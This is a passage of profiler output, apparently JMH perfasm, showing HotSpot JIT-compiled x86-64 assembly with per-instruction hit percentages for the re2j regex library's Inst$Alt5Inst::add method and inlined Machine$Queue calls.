0.04% 0.02% 0x00007eff1121fcb1: vmovq %rsi,%xmm4
0.25% 0.46% 0x00007eff1121fcb6: mov %ecx,%r14d
0.33% 0.28% 0x00007eff1121fcb9: mov 0x18(%rsi),%ecx ;*getfield pc
; - com.google.re2j.Inst$Alt5Inst::add@2 (line 260)
0.00% 0x00007eff1121fcbc: mov 0x10(%rdx),%r11 ;*getfield pcsl
; - com.google.re2j.Machine$Queue::contains@7 (line 42)
; - com.google.re2j.Inst$Alt5Inst::add@5 (line 260)
; implicit exception: dispatches to 0x00007eff112205d9
0.02% 0.02% 0x00007eff1121fcc0: cmp $0x40,%ecx
0x00007eff1121fcc3: jg 0x00007eff11220181 ;*if_icmpgt
; - com.google.re2j.Machine$Queue::contains@3 (line 41)
; - com.google.re2j.Inst$Alt5Inst::add@5 (line 260)
0.43% 0.33% 0x00007eff1121fcc9: mov $0x1,%esi
0.32% 0.34% 0x00007eff1121fcce: mov $0x1,%r8d
0.00% 0x00007eff1121fcd4: shl %cl,%r8 ;*lshl
; - com.google.re2j.Machine$Queue::contains@12 (line 42)
; - com.google.re2j.Inst$Alt5Inst::add@5 (line 260)
0.76% 0.48% 0x00007eff1121fcd7: mov %r11,%r10
0x00007eff1121fcda: and %r8,%r10 ;*land
; - com.google.re2j.Machine$Queue::contains@13 (line 42)
; - com.google.re2j.Inst$Alt5Inst::add@5 (line 260)
0.03% 0.02% 0x00007eff1121fcdd: xor %r13d,%r13d
0.26% 0.36% 0x00007eff1121fce0: test %r10,%r10
0x00007eff1121fce3: jne 0x00007eff112201b5 ;*ifeq
; - com.google.re2j.Machine$Queue::contains@16 (line 42)
; - com.google.re2j.Inst$Alt5Inst::add@5 (line 260)
0.34% 0.35% 0x00007eff1121fce9: cmp $0x40,%ecx
0x00007eff1121fcec: jge 0x00007eff112201f5 ;*if_icmpge
; - com.google.re2j.Machine$Queue::add@3 (line 51)
; - com.google.re2j.Inst$Alt5Inst::add@19 (line 263)
0x00007eff1121fcf2: mov %r12b,0x18(%rdx) ;*putfield empty
; - com.google.re2j.Machine$Queue::add@33 (line 56)
; - com.google.re2j.Inst$Alt5Inst::add@19 (line 263)
0.02% 0.04% 0x00007eff1121fcf6: vmovq %xmm4,%r10
0.36% 0.26% 0x00007eff1121fcfb: mov 0x2c(%r10),%ebp ;*getfield outInst
; - com.google.re2j.Inst$Alt5Inst::add@23 (line 265)
0.33% 0.28% 0x00007eff1121fcff: or %r11,%r8 ;*lor ; - com.google.re2j.Machine$Queue::add@14 (line 52)
; - com.google.re2j.Inst$Alt5Inst::add@19 (line 263)
0.00% 0x00007eff1121fd02: mov %r8,0x10(%rdx) ;*putfield pcsl
; - com.google.re2j.Machine$Queue::add@15 (line 52)
; - com.google.re2j.Inst$Alt5Inst::add@19 (line 263)
0.03% 0.03% 0x00007eff1121fd06: mov 0x8(%r12,%rbp,8),%r10d ; implicit exception: dispatches to 0x00007eff112205ed
0.37% 0.32% 0x00007eff1121fd0b: cmp $0xf8019909,%r10d ; {metadata('com/google/re2j/Inst$MatchInst')}
0x00007eff1121fd12: jne 0x00007eff11220065
0.33% 0.38% 0x00007eff1121fd18: lea (%r12,%rbp,8),%r11 ;*invokevirtual add
; - com.google.re2j.Inst$Alt5Inst::add@37 (line 265)
0x00007eff1121fd1c: mov 0x18(%r11),%ecx ;*getfield pc
; - com.google.re2j.Inst$MatchInst::add@2 (line 144)
; - com.google.re2j.Inst$Alt5Inst::add@37 (line 265)
0.01% 0.03% 0x00007eff1121fd20: cmp $0x40,%ecx
0x00007eff1121fd23: jg 0x00007eff11220229 ;*if_icmpgt
; - com.google.re2j.Machine$Queue::contains@3 (line 41)
; - com.google.re2j.Inst$MatchInst::add@5 (line 144)
; - com.google.re2j.Inst$Alt5Inst::add@37 (line 265)
0.32% 0.35% 0x00007eff1121fd29: mov $0x1,%r10d
0.35% 0.31% 0x00007eff1121fd2f: shl %cl,%r10 ;*lshl
; - com.google.re2j.Machine$Queue::contains@12 (line 42)
; - com.google.re2j.Inst$MatchInst::add@5 (line 144)
; - com.google.re2j.Inst$Alt5Inst::add@37 (line 265)
0.35% 0.41% 0x00007eff1121fd32: mov %r8,%rbx
0.31% 0.24% 0x00007eff1121fd35: and %r10,%rbx ;*land
; - com.google.re2j.Machine$Queue::contains@13 (line 42)
; - com.google.re2j.Inst$MatchInst::add@5 (line 144)
; - com.google.re2j.Inst$Alt5Inst::add@37 (line 265)
0.00% 0x00007eff1121fd38: test %rbx,%rbx
0x00007eff1121fd3b: jne 0x00007eff11220265 ;*ifeq
; - com.google.re2j.Machine$Queue::contains@16 (line 42)
; - com.google.re2j.Inst$MatchInst::add@5 (line 144)
; - com.google.re2j.Inst$Alt5Inst::add@37 (line 265)
0.06% 0.04% 0x00007eff1121fd41: cmp $0x40,%ecx
0x00007eff1121fd44: jge 0x00007eff112202ad ;*if_icmpge
; - com.google.re2j.Machine$Queue::add@3 (line 51)
; - com.google.re2j.Inst$MatchInst::add@19 (line 147)
; - com.google.re2j.Inst$Alt5Inst::add@37 (line 265)
0.38% 0.40% 0x00007eff1121fd4a: or %r10,%r8 ;*lor ; - com.google.re2j.Machine$Queue::add@14 (line 52)
; - com.google.re2j.Inst$MatchInst::add@19 (line 147)
; - com.google.re2j.Inst$Alt5Inst::add@37 (line 265)
0.30% 0.06% 0x00007eff1121fd4d: mov %r8,0x10(%rdx) ;*putfield pcsl
; - com.google.re2j.Machine$Queue::add@15 (line 52)
; - com.google.re2j.Inst$MatchInst::add@19 (line 147)
; - com.google.re2j.Inst$Alt5Inst::add@37 (line 265)
0.00% 0x00007eff1121fd51: mov 0x88(%rsp),%ecx
0.07% 0.05% 0x00007eff1121fd58: test %ecx,%ecx
0x00007eff1121fd5a: jne 0x00007eff112202e9 ;*ifeq
; - com.google.re2j.Inst$MatchInst::add@24 (line 149)
; - com.google.re2j.Inst$Alt5Inst::add@37 (line 265)
0.35% 0.44% 0x00007eff1121fd60: mov 0xc(%rdx),%edi ;*getfield size
; - com.google.re2j.Machine$Queue::addThread@6 (line 66)
; - com.google.re2j.Inst$MatchInst::add@72 (line 158)
; - com.google.re2j.Inst$Alt5Inst::add@37 (line 265)
0.30% 0.18% 0x00007eff1121fd63: mov 0x20(%rdx),%eax ;*getfield denseThreadsInstructions
; - com.google.re2j.Machine$Queue::addThread@1 (line 66)
; - com.google.re2j.Inst$MatchInst::add@72 (line 158)
; - com.google.re2j.Inst$Alt5Inst::add@37 (line 265)
0.01% 0x00007eff1121fd66: mov %edi,%r10d
0.07% 0.10% 0x00007eff1121fd69: inc %r10d ;*iadd
; - com.google.re2j.Machine$Queue::addThread@11 (line 66)
; - com.google.re2j.Inst$MatchInst::add@72 (line 158)
; - com.google.re2j.Inst$Alt5Inst::add@37 (line 265)
0.34% 0.50% 0x00007eff1121fd6c: mov %r10d,0xc(%rdx) ;*putfield size
; - com.google.re2j.Machine$Queue::addThread@12 (line 66)
; - com.google.re2j.Inst$MatchInst::add@72 (line 158)
; - com.google.re2j.Inst$Alt5Inst::add@37 (line 265)
0.30% 0.38% 0x00007eff1121fd70: mov 0xc(%r12,%rax,8),%ebx ; implicit exception: dispatches to 0x00007eff11220615
0x00007eff1121fd75: cmp %ebx,%edi
╭ 0x00007eff1121fd77: jae 0x00007eff1121ffe8
0.05% 0.07% │ 0x00007eff1121fd7d: vmovd %r10d,%xmm2
0.35% 0.51% │ 0x00007eff1121fd82: vmovd %eax,%xmm0
0.36% 0.28% │ 0x00007eff1121fd86: mov %edi,%eax
│ 0x00007eff1121fd88: vmovd %xmm0,%r10d
0.04% 0.06% │ 0x00007eff1121fd8d: mov 0x8(%r12,%r10,8),%r10d
0.30% 0.39% │ 0x00007eff1121fd92: cmp $0xf8019807,%r10d ; {metadata('com/google/re2j/Inst'[])}
│ 0x00007eff1121fd99: jne 0x00007eff11220095 ;*aastore
│ ; - com.google.re2j.Machine$Queue::addThread@16 (line 66)
│ ; - com.google.re2j.Inst$MatchInst::add@72 (line 158)
│ ; - com.google.re2j.Inst$Alt5Inst::add@37 (line 265)
0.26% 0.40% │ 0x00007eff1121fd9f: vmovq %xmm4,%r10
│ 0x00007eff1121fda4: mov 0x34(%r10),%ebp ;*getfield inst2
│ ; - com.google.re2j.Inst$Alt5Inst::add@43 (line 266)
0.05% 0.06% │ 0x00007eff1121fda8: mov %r11,%rcx
0.45% 0.37% │ 0x00007eff1121fdab: shr $0x3,%rcx ;*aastore
│ ; - com.google.re2j.Machine$Queue::addThread@16 (line 66)
│ ; - com.google.re2j.Inst$MatchInst::add@72 (line 158)
│ ; - com.google.re2j.Inst$Alt5Inst::add@37 (line 265)
0.30% 0.33% │ 0x00007eff1121fdaf: vmovd %xmm0,%r10d
│ 0x00007eff1121fdb4: lea (%r12,%r10,8),%r11 ;*getfield denseThreadsInstructions
│ ; - com.google.re2j.Machine$Queue::addThread@1 (line 66)
│ ; - com.google.re2j.Inst$MatchInst::add@72 (line 158)
│ ; - com.google.re2j.Inst$Alt5Inst::add@37 (line 265)
0.09% 0.06% │ 0x00007eff1121fdb8: lea 0x10(%r11,%rdi,4),%r10
0.32% 0.35% │ 0x00007eff1121fdbd: mov %ecx,(%r10)
0.59% 0.52% │ 0x00007eff1121fdc0: shr $0x9,%r10
0.00% │ 0x00007eff1121fdc4: movabs $0x7eff20d45000,%rdi
0.07% 0.08% │ 0x00007eff1121fdce: mov %r12b,(%rdi,%r10,1) ;*aastore
│ ; - com.google.re2j.Machine$Queue::addThread@16 (line 66)
│ ; - com.google.re2j.Inst$MatchInst::add@72 (line 158)
│ ; - com.google.re2j.Inst$Alt5Inst::add@37 (line 265)
0.51% 0.46% │ 0x00007eff1121fdd2: mov 0x8(%r12,%rbp,8),%r10d ; implicit exception: dispatches to 0x00007eff11220631
0.22% 0.18% │ 0x00007eff1121fdd7: cmp $0xf8019909,%r10d ; {metadata('com/google/re2j/Inst$MatchInst')}
│ 0x00007eff1121fdde: jne 0x00007eff112200d5
0.01% 0.00% │ 0x00007eff1121fde4: lea (%r12,%rbp,8),%r10 ;*invokevirtual add
│ ; - com.google.re2j.Inst$Alt5Inst::add@57 (line 266)
0.05% 0.02% │ 0x00007eff1121fde8: vmovq %r10,%xmm1
0.34% 0.26% │ 0x00007eff1121fded: mov 0x18(%r10),%ecx ;*getfield pc
│ ; - com.google.re2j.Inst$MatchInst::add@2 (line 144)
│ ; - com.google.re2j.Inst$Alt5Inst::add@57 (line 266)
0.36% 0.32% │ 0x00007eff1121fdf1: vmovd %ecx,%xmm3
0.03% 0.02% │ 0x00007eff1121fdf5: cmp $0x40,%ecx
│ 0x00007eff1121fdf8: jg 0x00007eff11220325 ;*if_icmpgt
│ ; - com.google.re2j.Machine$Queue::contains@3 (line 41)
│ ; - com.google.re2j.Inst$MatchInst::add@5 (line 144)
│ ; - com.google.re2j.Inst$Alt5Inst::add@57 (line 266)
0.01% 0.02% │ 0x00007eff1121fdfe: mov $0x1,%r10d
0.44% 0.34% │ 0x00007eff1121fe04: shl %cl,%r10 ;*lshl
│ ; - com.google.re2j.Machine$Queue::contains@12 (line 42)
│ ; - com.google.re2j.Inst$MatchInst::add@5 (line 144)
│ ; - com.google.re2j.Inst$Alt5Inst::add@57 (line 266)
0.39% 0.29% │ 0x00007eff1121fe07: mov %r8,%rcx
0.36% 0.41% │ 0x00007eff1121fe0a: and %r10,%rcx ;*land
│ ; - com.google.re2j.Machine$Queue::contains@13 (line 42)
│ ; - com.google.re2j.Inst$MatchInst::add@5 (line 144)
│ ; - com.google.re2j.Inst$Alt5Inst::add@57 (line 266)
0.19% 0.30% │ 0x00007eff1121fe0d: test %rcx,%rcx
│ 0x00007eff1121fe10: jne 0x00007eff11220361 ;*ifeq
│ ; - com.google.re2j.Machine$Queue::contains@16 (line 42)
│ ; - com.google.re2j.Inst$MatchInst::add@5 (line 144)
│ ; - com.google.re2j.Inst$Alt5Inst::add@57 (line 266)
0.06% 0.06% │ 0x00007eff1121fe16: vmovd %xmm3,%ecx
0.04% 0.04% │ 0x00007eff1121fe1a: cmp $0x40,%ecx
│ 0x00007eff1121fe1d: jge 0x00007eff112203a5 ;*if_icmpge
│ ; - com.google.re2j.Machine$Queue::add@3 (line 51)
│ ; - com.google.re2j.Inst$MatchInst::add@19 (line 147)
│ ; - com.google.re2j.Inst$Alt5Inst::add@57 (line 266)
0.44% 0.48% │ 0x00007eff1121fe23: or %r10,%r8 ;*lor ; - com.google.re2j.Machine$Queue::add@14 (line 52)
│ ; - com.google.re2j.Inst$MatchInst::add@19 (line 147)
│ ; - com.google.re2j.Inst$Alt5Inst::add@57 (line 266)
0.25% 0.16% │ 0x00007eff1121fe26: mov %r8,0x10(%rdx) ;*putfield pcsl
│ ; - com.google.re2j.Machine$Queue::add@15 (line 52)
│ ; - com.google.re2j.Inst$MatchInst::add@19 (line 147)
│ ; - com.google.re2j.Inst$Alt5Inst::add@57 (line 266)
0.00% 0.01% │ 0x00007eff1121fe2a: mov %eax,%ecx
0.03% 0.03% │ 0x00007eff1121fe2c: add $0x2,%ecx
0.44% 0.36% │ 0x00007eff1121fe2f: mov %ecx,0xc(%rdx) ;*putfield size
│ ; - com.google.re2j.Machine$Queue::addThread@12 (line 66)
│ ; - com.google.re2j.Inst$MatchInst::add@72 (line 158)
│ ; - com.google.re2j.Inst$Alt5Inst::add@57 (line 266)
0.17% 0.16% │ 0x00007eff1121fe32: mov %eax,%r10d
0.01% 0.00% │ 0x00007eff1121fe35: add $0x4,%r10d ;*iadd
│ ; - com.google.re2j.Machine$Queue::addThread@11 (line 66)
│ ; - com.google.re2j.Inst$MatchInst::add@72 (line 158)
│ ; - com.google.re2j.Inst$Alt5Inst::add@97 (line 268)
0.05% 0.07% │ 0x00007eff1121fe39: cmp %ebx,%r10d
│ 0x00007eff1121fe3c: jae 0x00007eff11220025 ;*aastore
│ ; - com.google.re2j.Machine$Queue::addThread@16 (line 66)
│ ; - com.google.re2j.Inst$MatchInst::add@72 (line 158)
│ ; - com.google.re2j.Inst$Alt5Inst::add@57 (line 266)
0.36% 0.56% │ 0x00007eff1121fe42: vmovd %r9d,%xmm3
0.15% 0.29% │ 0x00007eff1121fe47: vmovq %xmm4,%r9
0.00% │ 0x00007eff1121fe4c: mov 0x38(%r9),%ebp ;*getfield inst3
│ ; - com.google.re2j.Inst$Alt5Inst::add@63 (line 267)
0.06% 0.06% │ 0x00007eff1121fe50: vmovq %xmm1,%r9
0.33% 0.41% │ 0x00007eff1121fe55: mov %r9,%rcx
0.21% 0.19% │ 0x00007eff1121fe58: shr $0x3,%rcx ;*aastore
│ ; - com.google.re2j.Machine$Queue::addThread@16 (line 66)
│ ; - com.google.re2j.Inst$MatchInst::add@72 (line 158)
│ ; - com.google.re2j.Inst$Alt5Inst::add@57 (line 266)
0.00% │ 0x00007eff1121fe5c: movslq %eax,%r9
0.07% 0.08% │ 0x00007eff1121fe5f: lea (%r11,%r9,4),%r9 ;*aastore
│ ; - com.google.re2j.Machine$Queue::addThread@16 (line 66)
│ ; - com.google.re2j.Inst$MatchInst::add@72 (line 158)
│ ; - com.google.re2j.Inst$Alt5Inst::add@117 (line 269)
0.43% 0.53% │ 0x00007eff1121fe63: mov %r9,%rbx
0.20% 0.32% │ 0x00007eff1121fe66: add $0x14,%rbx
0.01% │ 0x00007eff1121fe6a: mov %ecx,(%rbx)
0.07% 0.03% │ 0x00007eff1121fe6c: mov %rbx,%rcx
0.40% 0.41% │ 0x00007eff1121fe6f: shr $0x9,%rcx
0.19% 0.15% │ 0x00007eff1121fe73: mov %r12b,(%rdi,%rcx,1) ;*aastore
│ ; - com.google.re2j.Machine$Queue::addThread@16 (line 66)
│ ; - com.google.re2j.Inst$MatchInst::add@72 (line 158)
│ ; - com.google.re2j.Inst$Alt5Inst::add@57 (line 266)
0.00% 0.02% │ 0x00007eff1121fe77: mov 0x8(%r12,%rbp,8),%ecx ; implicit exception: dispatches to 0x00007eff11220655
0.08% 0.02% │ 0x00007eff1121fe7c: cmp $0xf8019909,%ecx ; {metadata('com/google/re2j/Inst$MatchInst')}
│ 0x00007eff1121fe82: jne 0x00007eff11220101
0.45% 0.46% │ 0x00007eff1121fe88: lea (%r12,%rbp,8),%rcx ;*invokevirtual add
│ ; - com.google.re2j.Inst$Alt5Inst::add@77 (line 267)
0.18% 0.37% │ 0x00007eff1121fe8c: vmovq %rcx,%xmm0
0.01% 0.00% │ 0x00007eff1121fe91: mov 0x18(%rcx),%ecx ;*getfield pc
│ ; - com.google.re2j.Inst$MatchInst::add@2 (line 144)
│ ; - com.google.re2j.Inst$Alt5Inst::add@77 (line 267)
0.06% 0.09% │ 0x00007eff1121fe94: vmovd %ecx,%xmm2
0.49% 0.42% │ 0x00007eff1121fe98: cmp $0x40,%ecx
│ 0x00007eff1121fe9b: jg 0x00007eff112203e1 ;*if_icmpgt
│ ; - com.google.re2j.Machine$Queue::contains@3 (line 41)
│ ; - com.google.re2j.Inst$MatchInst::add@5 (line 144)
│ ; - com.google.re2j.Inst$Alt5Inst::add@77 (line 267)
0.19% 0.27% │ 0x00007eff1121fea1: mov $0x1,%ebx
0.01% 0.02% │ 0x00007eff1121fea6: shl %cl,%rbx ;*lshl
│ ; - com.google.re2j.Machine$Queue::contains@12 (line 42)
│ ; - com.google.re2j.Inst$MatchInst::add@5 (line 144)
│ ; - com.google.re2j.Inst$Alt5Inst::add@77 (line 267)
0.77% 0.88% │ 0x00007eff1121fea9: mov %r8,%rcx
0.02% 0.00% │ 0x00007eff1121feac: and %rbx,%rcx ;*land
│ ; - com.google.re2j.Machine$Queue::contains@13 (line 42)
│ ; - com.google.re2j.Inst$MatchInst::add@5 (line 144)
│ ; - com.google.re2j.Inst$Alt5Inst::add@77 (line 267)
0.03% 0.05% │ 0x00007eff1121feaf: test %rcx,%rcx
│ 0x00007eff1121feb2: jne 0x00007eff1122041d ;*ifeq
│ ; - com.google.re2j.Machine$Queue::contains@16 (line 42)
│ ; - com.google.re2j.Inst$MatchInst::add@5 (line 144)
│ ; - com.google.re2j.Inst$Alt5Inst::add@77 (line 267)
0.43% 0.46% │ 0x00007eff1121feb8: vmovd %xmm2,%ecx
0.28% 0.29% │ 0x00007eff1121febc: cmp $0x40,%ecx
│ 0x00007eff1121febf: jge 0x00007eff11220465 ;*if_icmpge
│ ; - com.google.re2j.Machine$Queue::add@3 (line 51)
│ ; - com.google.re2j.Inst$MatchInst::add@19 (line 147)
│ ; - com.google.re2j.Inst$Alt5Inst::add@77 (line 267)
0.03% 0.04% │ 0x00007eff1121fec5: or %rbx,%r8 ;*lor ; - com.google.re2j.Machine$Queue::add@14 (line 52)
│ ; - com.google.re2j.Inst$MatchInst::add@19 (line 147)
│ ; - com.google.re2j.Inst$Alt5Inst::add@77 (line 267)
0.02% 0.06% │ 0x00007eff1121fec8: mov %r8,0x10(%rdx) ;*putfield pcsl
│ ; - com.google.re2j.Machine$Queue::add@15 (line 52)
│ ; - com.google.re2j.Inst$MatchInst::add@19 (line 147)
│ ; - com.google.re2j.Inst$Alt5Inst::add@77 (line 267)
0.33% 0.36% │ 0x00007eff1121fecc: vmovq %xmm4,%rcx
0.20% 0.18% │ 0x00007eff1121fed1: mov 0x3c(%rcx),%ebp ;*getfield inst4
│ ; - com.google.re2j.Inst$Alt5Inst::add@83 (line 268)
0.05% 0.01% │ 0x00007eff1121fed4: mov %r9,%rbx
0.04% 0.07% │ 0x00007eff1121fed7: add $0x18,%rbx
0.38% 0.45% │ 0x00007eff1121fedb: vmovq %xmm0,%rcx
0.18% 0.28% │ 0x00007eff1121fee0: shr $0x3,%rcx
0.03% 0.02% │ 0x00007eff1121fee4: mov %ecx,(%rbx) ;*aastore
│ ; - com.google.re2j.Machine$Queue::addThread@16 (line 66)
│ ; - com.google.re2j.Inst$MatchInst::add@72 (line 158)
│ ; - com.google.re2j.Inst$Alt5Inst::add@77 (line 267)
0.04% 0.05% │ 0x00007eff1121fee6: mov %eax,%ecx
0.46% 0.34% │ 0x00007eff1121fee8: add $0x3,%ecx
0.20% 0.22% │ 0x00007eff1121feeb: mov %ecx,0xc(%rdx) ;*putfield size
│ ; - com.google.re2j.Machine$Queue::addThread@12 (line 66)
│ ; - com.google.re2j.Inst$MatchInst::add@72 (line 158)
│ ; - com.google.re2j.Inst$Alt5Inst::add@77 (line 267)
0.03% 0.06% │ 0x00007eff1121feee: shr $0x9,%rbx
0.04% 0.06% │ 0x00007eff1121fef2: mov %r12b,(%rdi,%rbx,1) ;*aastore
│ ; - com.google.re2j.Machine$Queue::addThread@16 (line 66)
│ ; - com.google.re2j.Inst$MatchInst::add@72 (line 158)
│ ; - com.google.re2j.Inst$Alt5Inst::add@77 (line 267)
0.45% 0.38% │ 0x00007eff1121fef6: mov 0x8(%r12,%rbp,8),%ecx ; implicit exception: dispatches to 0x00007eff1122067d
0.18% 0.20% │ 0x00007eff1121fefb: cmp $0xf8019909,%ecx ; {metadata('com/google/re2j/Inst$MatchInst')}
│ 0x00007eff1121ff01: jne 0x00007eff1122012d
0.04% 0.02% │ 0x00007eff1121ff07: lea (%r12,%rbp,8),%rcx ;*invokevirtual add
│ ; - com.google.re2j.Inst$Alt5Inst::add@97 (line 268)
0.04% 0.05% │ 0x00007eff1121ff0b: vmovq %rcx,%xmm0
0.46% 0.51% │ 0x00007eff1121ff10: mov 0x18(%rcx),%ecx ;*getfield pc
│ ; - com.google.re2j.Inst$MatchInst::add@2 (line 144)
│ ; - com.google.re2j.Inst$Alt5Inst::add@97 (line 268)
0.21% 0.23% │ 0x00007eff1121ff13: vmovd %ecx,%xmm1
0.04% 0.02% │ 0x00007eff1121ff17: cmp $0x40,%ecx
│ 0x00007eff1121ff1a: jg 0x00007eff112204a1 ;*if_icmpgt
│ ; - com.google.re2j.Machine$Queue::contains@3 (line 41)
│ ; - com.google.re2j.Inst$MatchInst::add@5 (line 144)
│ ; - com.google.re2j.Inst$Alt5Inst::add@97 (line 268)
0.03% 0.04% │ 0x00007eff1121ff20: mov $0x1,%ebx
0.36% 0.52% │ 0x00007eff1121ff25: shl %cl,%rbx ;*lshl
│ ; - com.google.re2j.Machine$Queue::contains@12 (line 42)
│ ; - com.google.re2j.Inst$MatchInst::add@5 (line 144)
│ ; - com.google.re2j.Inst$Alt5Inst::add@97 (line 268)
0.35% 0.35% │ 0x00007eff1121ff28: mov %r8,%rcx
0.35% 0.14% │ 0x00007eff1121ff2b: and %rbx,%rcx ;*land
│ ; - com.google.re2j.Machine$Queue::contains@13 (line 42)
│ ; - com.google.re2j.Inst$MatchInst::add@5 (line 144)
│ ; - com.google.re2j.Inst$Alt5Inst::add@97 (line 268)
0.20% 0.11% │ 0x00007eff1121ff2e: test %rcx,%rcx
│ 0x00007eff1121ff31: jne 0x00007eff112204dd ;*ifeq
│ ; - com.google.re2j.Machine$Queue::contains@16 (line 42)
│ ; - com.google.re2j.Inst$MatchInst::add@5 (line 144)
│ ; - com.google.re2j.Inst$Alt5Inst::add@97 (line 268)
0.02% 0.03% │ 0x00007eff1121ff37: vmovd %xmm1,%ecx
0.03% 0.05% │ 0x00007eff1121ff3b: cmp $0x40,%ecx
│ 0x00007eff1121ff3e: jge 0x00007eff11220525 ;*if_icmpge
│ ; - com.google.re2j.Machine$Queue::add@3 (line 51)
│ ; - com.google.re2j.Inst$MatchInst::add@19 (line 147)
│ ; - com.google.re2j.Inst$Alt5Inst::add@97 (line 268)
0.46% 0.46% │ 0x00007eff1121ff44: mov %r10d,0xc(%rdx) ;*putfield size
│ ; - com.google.re2j.Machine$Queue::addThread@12 (line 66)
│ ; - com.google.re2j.Inst$MatchInst::add@72 (line 158)
│ ; - com.google.re2j.Inst$Alt5Inst::add@97 (line 268)
0.25% 0.26% │ 0x00007eff1121ff48: vmovq %xmm4,%r10
0.01% 0.03% │ 0x00007eff1121ff4d: mov 0x40(%r10),%ebp ;*getfield inst5
│ ; - com.google.re2j.Inst$Alt5Inst::add@103 (line 269)
0.04% 0.02% │ 0x00007eff1121ff51: mov %r9,%rcx
0.35% 0.43% │ 0x00007eff1121ff54: add $0x1c,%rcx ;*aastore
│ ; - com.google.re2j.Machine$Queue::addThread@16 (line 66)
│ ; - com.google.re2j.Inst$MatchInst::add@72 (line 158)
│ ; - com.google.re2j.Inst$Alt5Inst::add@97 (line 268)
0.19% 0.26% │ 0x00007eff1121ff58: or %rbx,%r8 ;*lor ; - com.google.re2j.Machine$Queue::add@14 (line 52)
│ ; - com.google.re2j.Inst$MatchInst::add@19 (line 147)
│ ; - com.google.re2j.Inst$Alt5Inst::add@97 (line 268)
0.02% 0.03% │ 0x00007eff1121ff5b: mov %r8,0x10(%rdx) ;*putfield pcsl
│ ; - com.google.re2j.Machine$Queue::add@15 (line 52)
│ ; - com.google.re2j.Inst$MatchInst::add@19 (line 147)
│ ; - com.google.re2j.Inst$Alt5Inst::add@97 (line 268)
0.05% 0.03% │ 0x00007eff1121ff5f: vmovq %xmm0,%r10
0.40% 0.44% │ 0x00007eff1121ff64: shr $0x3,%r10
0.22% 0.26% │ 0x00007eff1121ff68: mov %r10d,(%rcx)
0.02% 0.04% │ 0x00007eff1121ff6b: mov %rcx,%r10
0.04% 0.05% │ 0x00007eff1121ff6e: shr $0x9,%r10
0.47% 0.56% │ 0x00007eff1121ff72: mov %r12b,(%rdi,%r10,1) ;*aastore
│ ; - com.google.re2j.Machine$Queue::addThread@16 (line 66)
│ ; - com.google.re2j.Inst$MatchInst::add@72 (line 158)
│ ; - com.google.re2j.Inst$Alt5Inst::add@97 (line 268)
0.18% 0.29% │ 0x00007eff1121ff76: mov 0x8(%r12,%rbp,8),%r10d ; implicit exception: dispatches to 0x00007eff112206a5
0.02% 0.05% │ 0x00007eff1121ff7b: cmp $0xf8019909,%r10d ; {metadata('com/google/re2j/Inst$MatchInst')}
│ 0x00007eff1121ff82: jne 0x00007eff11220159
0.05% 0.04% │ 0x00007eff1121ff88: lea (%r12,%rbp,8),%r10 ;*invokevirtual add
│ ; - com.google.re2j.Inst$Alt5Inst::add@117 (line 269)
0.46% 0.38% │ 0x00007eff1121ff8c: mov 0x18(%r10),%ecx ;*getfield pc
│ ; - com.google.re2j.Inst$MatchInst::add@2 (line 144)
│ ; - com.google.re2j.Inst$Alt5Inst::add@117 (line 269)
0.19% 0.20% │ 0x00007eff1121ff90: cmp $0x40,%ecx
│ 0x00007eff1121ff93: jg 0x00007eff11220561 ;*if_icmpgt
│ ; - com.google.re2j.Machine$Queue::contains@3 (line 41)
│ ; - com.google.re2j.Inst$MatchInst::add@5 (line 144)
│ ; - com.google.re2j.Inst$Alt5Inst::add@117 (line 269)
0.06% 0.04% │ 0x00007eff1121ff99: shl %cl,%rsi ;*lshl
│ ; - com.google.re2j.Machine$Queue::contains@12 (line 42)
│ ; - com.google.re2j.Inst$MatchInst::add@5 (line 144)
│ ; - com.google.re2j.Inst$Alt5Inst::add@117 (line 269)
0.67% 0.67% │ 0x00007eff1121ff9c: mov %r8,%rbx
0.02% 0.04% │ 0x00007eff1121ff9f: and %rsi,%rbx ;*land
│ ; - com.google.re2j.Machine$Queue::contains@13 (line 42)
│ ; - com.google.re2j.Inst$MatchInst::add@5 (line 144)
│ ; - com.google.re2j.Inst$Alt5Inst::add@117 (line 269)
0.04% 0.05% │ 0x00007eff1121ffa2: test %rbx,%rbx
│ 0x00007eff1121ffa5: jne 0x00007eff11220585 ;*ifeq
│ ; - com.google.re2j.Machine$Queue::contains@16 (line 42)
│ ; - com.google.re2j.Inst$MatchInst::add@5 (line 144)
│ ; - com.google.re2j.Inst$Alt5Inst::add@117 (line 269)
0.48% 0.31% │ 0x00007eff1121ffab: cmp $0x40,%ecx
│ 0x00007eff1121ffae: jge 0x00007eff112205b5 ;*if_icmpge
│ ; - com.google.re2j.Machine$Queue::add@3 (line 51)
│ ; - com.google.re2j.Inst$MatchInst::add@19 (line 147)
│ ; - com.google.re2j.Inst$Alt5Inst::add@117 (line 269)
0.17% 0.27% │ 0x00007eff1121ffb4: or %rsi,%r8
0.01% 0.03% │ 0x00007eff1121ffb7: mov %r8,0x10(%rdx) ;*putfield pcsl
│ ; - com.google.re2j.Machine$Queue::add@15 (line 52)
│ ; - com.google.re2j.Inst$MatchInst::add@19 (line 147)
│ ; - com.google.re2j.Inst$Alt5Inst::add@117 (line 269)
0.05% 0.10% │ 0x00007eff1121ffbb: add $0x20,%r9
0.43% 0.53% │ 0x00007eff1121ffbf: mov %r10,%r11
0.18% 0.25% │ 0x00007eff1121ffc2: shr $0x3,%r11
0.04% 0.01% │ 0x00007eff1121ffc6: mov %r11d,(%r9) ;*aastore
│ ; - com.google.re2j.Machine$Queue::addThread@16 (line 66)
│ ; - com.google.re2j.Inst$MatchInst::add@72 (line 158)
│ ; - com.google.re2j.Inst$Alt5Inst::add@117 (line 269)
0.04% 0.07% │ 0x00007eff1121ffc9: mov %r9,%r10
0.42% 0.42% │ 0x00007eff1121ffcc: add $0x5,%eax
0.26% 0.14% │ 0x00007eff1121ffcf: mov %eax,0xc(%rdx) ;*putfield size
│ ; - com.google.re2j.Machine$Queue::addThread@12 (line 66)
│ ; - com.google.re2j.Inst$MatchInst::add@72 (line 158)
│ ; - com.google.re2j.Inst$Alt5Inst::add@117 (line 269)
0.02% 0.01% │ 0x00007eff1121ffd2: shr $0x9,%r10
0.06% 0.02% │ 0x00007eff1121ffd6: mov %r12b,(%rdi,%r10,1) ;*aastore
│ ; - com.google.re2j.Machine$Queue::addThread@16 (line 66)
│ ; - com.google.re2j.Inst$MatchInst::add@72 (line 158)
│ ; - com.google.re2j.Inst$Alt5Inst::add@117 (line 269)
0.39% 0.26% │ 0x00007eff1121ffda: xor %eax,%eax
0.23% 0.31% │ 0x00007eff1121ffdc: add $0x70,%rsp
